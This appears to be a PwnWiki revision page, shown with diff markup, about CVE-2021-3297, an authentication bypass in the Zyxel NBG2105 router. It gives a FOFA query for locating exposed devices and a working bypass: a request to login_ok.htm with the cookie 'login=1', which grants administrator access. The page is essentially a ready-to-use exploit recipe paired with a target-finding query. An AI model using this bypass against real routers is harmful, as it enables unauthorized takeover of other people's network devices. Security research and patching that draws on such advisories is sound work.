Difference between revisions of "CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞/en"
From PwnWiki
(Created page with "CVE-2021-3297 Zyxel NBG2105 authentication bypass vulnerability") |
(Created page with "The front-end file <code>/js/util_gw.js</code> has the front-end verification of the <code>Cookie login</code> parameter.") |
||
| (One intermediate revision by the same user not shown) | |||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
| − | + | ==Vulnerability Impact== | |
| − | = | ||
| − | |||
<pre> | <pre> | ||
Zyxel NBG2105 | Zyxel NBG2105 | ||
| Line 17: | Line 15: | ||
| − | + | The front-end file <code>/js/util_gw.js</code> has the front-end verification of the <code>Cookie login</code> parameter. | |
| − | |||
| − | |||
| − | + | If you request the following, you will be redirected to the <code>home.htm</code> page as an administrator. | |
| − | |||
| − | |||
<pre> | <pre> | ||
Latest revision as of 16:06, 6 April 2021
Vulnerability Impact
Zyxel NBG2105
FOFA
app="ZyXEL-NBG2105"
The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.
If you request the following, you will be redirected to the home.htm page as an administrator.
http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;
